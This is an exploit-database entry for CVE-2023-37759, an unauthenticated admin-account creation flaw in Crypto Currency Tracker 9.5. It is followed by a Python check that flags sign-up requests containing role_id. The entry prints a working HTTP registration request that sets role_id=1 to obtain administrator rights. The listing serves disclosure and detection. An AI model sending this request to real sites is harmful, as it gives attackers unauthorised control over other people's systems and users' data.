Crypto Currency Tracker (CCT) 9.5 – Admin Account Creation (Unauthenticated)

  • Author: 0xBr
    Date: 2023-08-21
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51688/
  • # Exploit Title: Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)
    # Date: 11.08.2023
    # Exploit Author: 0xBr
    # Software Link: https://codecanyon.net/item/crypto-currency-tracker-prices-charts-news-icos-info-and-more/21588008
    # Version: <=9.5
    # CVE: CVE-2023-37759
    
    POST /en/user/register HTTP/2
    Host: localhost
    Cookie: XSRF-TOKEN=[TOKEN]; laravel_session=[LARAVEL_SESSION]; SELECTED_CURRENCY=USD; SELECTED_CURRENCY_PRICE=1; cookieconsent_status=dismiss
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 756
    
    _token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=Register
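
A defender-side check for the request shape shown above, as an added example that is not part of the original exploit-db entry: it flags sign-up requests that carry `role_id`, whether in the body or the query string. The `/user/register` path suffix, the expected-field list and the sample requests are assumptions constructed from the request on this page.

```python
from urllib.parse import parse_qs, urlsplit

# Assumption: fields the public sign-up form legitimately submits (the
# parameters of the request on this page, minus role_id).
EXPECTED_FIELDS = {"_token", "name", "email", "password",
                   "g-recaptcha-response", "submit_register"}
PRIVILEGE_FIELDS = {"role_id"}  # privilege-bearing field from this page


def inspect_registration(raw_request: str) -> dict:
    """Return {"verdict": ignore|ok|review|alert, "fields": [...]}."""
    head, _, body = raw_request.replace("\r\n", "\n").partition("\n\n")
    request_line = head.split("\n", 1)[0].split()
    if len(request_line) < 2:
        return {"verdict": "ignore", "fields": []}
    method, target = request_line[0].upper(), urlsplit(request_line[1])
    if method != "POST" or not target.path.rstrip("/").endswith("/user/register"):
        return {"verdict": "ignore", "fields": []}

    # Check query string and body: server frameworks often merge the two.
    # keep_blank_values keeps an empty "role_id=" visible.
    names = set()
    for part in (target.query, body.strip()):
        for key in parse_qs(part, keep_blank_values=True):
            names.add(key.split("[", 1)[0].strip().lower())  # role_id[] -> role_id

    privileged = sorted(names & PRIVILEGE_FIELDS)
    if privileged:
        return {"verdict": "alert", "fields": privileged}
    unexpected = sorted(names - EXPECTED_FIELDS)
    if unexpected:
        return {"verdict": "review", "fields": unexpected}
    return {"verdict": "ok", "fields": []}


# Constructed sample requests (placeholder values, not captured traffic).
_HEAD = ("POST /en/user/register HTTP/2\nHost: localhost\n"
         "Content-Type: application/x-www-form-urlencoded\n\n")
_FORM = "_token=t&name=alice&email=alice%40example.test&password=pw&submit_register=Register"
SAMPLE_NORMAL = _HEAD + _FORM
SAMPLE_ROLE = _HEAD + _FORM + "&role_id=1"

if __name__ == "__main__":
    for label, req in (("normal", SAMPLE_NORMAL), ("role_id", SAMPLE_ROLE)):
        print(label, inspect_registration(req))
```

An `alert` verdict on a public registration endpoint is worth correlating with any newly created account whose role is administrative.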